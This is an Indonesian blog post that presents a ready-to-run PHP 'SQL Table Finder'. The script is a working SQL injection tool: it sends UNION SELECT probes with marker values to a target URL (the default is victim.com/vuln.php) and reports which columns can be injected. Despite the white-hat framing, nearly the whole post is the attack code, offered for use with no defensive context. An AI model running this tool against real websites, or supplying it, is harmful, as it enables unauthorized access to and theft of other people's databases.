PHP Script Finder Table

Ini adalah script php yang digunakan oleh web security untuk mencari table dalam sebuah database website. Ini sangat berguna sekali bagi IT Security untuk White Hat.

<html>
<head>
<title>..::[�] SQL Table Finder [�]::..</title>
<meta http-equiv=”expires” content=”0″>
<style>
body,table{
font-family:courier new;
font-size:11px;
color:#00FF00;
background-color:#000000;
}
</style>
</head>

<body>
<center>
<form action=”” method=”post”>
<b>Specify the website:</b>
<input size=”40″ type=”text” name=”site” value=”http://victim.com/vuln.php?bug=1&#8243; style=”color: #0066cc; border: 1px solid #0066cc;background-color: #000000″>
<input size=”1″ type=”text” name=”separator” value=”+” style=”color: #0066cc; border: 1px solid #0066cc;background-color: #000000″>
<input size=”1″ type=”text” name=”comment” value=”–” style=”color: #0066cc; border: 1px solid #0066cc;background-color: #000000″>
<input type=”hidden” name=”go” value=”GO!” style=”color: #0066cc; border: 1px solid #0066cc;background-color: #000000″>
<input type=”submit” text=”GO!” style=”color: #0066cc; border: 1px solid #0066cc;background-color: #000000″>
</form>
<?php
if (isset($_POST[‘go’])) {
set_time_limit(0); //disable timeout
$working_union = false;
for ($i = 1; $i < 100; $i++) {
$url = $_POST[‘site’] . $_POST[‘separator’] . ‘AND’ . $_POST[‘separator’] . ’1=0′ . $_POST[‘separator’] . ‘UNION’ . $_POST[‘separator’] . ‘SELECT’ . $_POST[‘separator’];
for ($j = 1; $j <= $i; $j++) {
$url .= sprintf(’6191337%02d’, $j);
if ($j < $i) {
$url .= ‘,’;
}
}
$url .= $_POST[‘comment’];
//echo ‘TESTING URL: ‘, $url, ‘<br>’;
$page = view_page($url);
$page = strip_tags($page);
if (!(strpos($page, ’6191337′) === false)) {
$working_union = true;
echo ‘<font color=”red”>FOUND WORKING UNION!</font><br>’;
$url = str_replace(’61913370′, ”, $url);
$url = str_replace(’6191337′, ”, $url);
echo ‘<font color=”green”>’, $url, ‘</font><br>’;
while (true) {
$page = substr(strstr($page, ’6191337′), 7);
if ($page == false) {
break;
}
echo ‘Injectable parameter: ‘, (int) substr($page, 0, 2), ‘<br>’;
}
break;
}
}
if ($working_union == false) {
print ‘<font color=”red”>NO WORKING UNION FOUND!</font><br>’;
}
}

function view_page($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)”);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
?>
</body>
</html>

Simpan script ini dengan ekstension .php

Terima kasih anda telah mengunjungi azizalfian.com

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s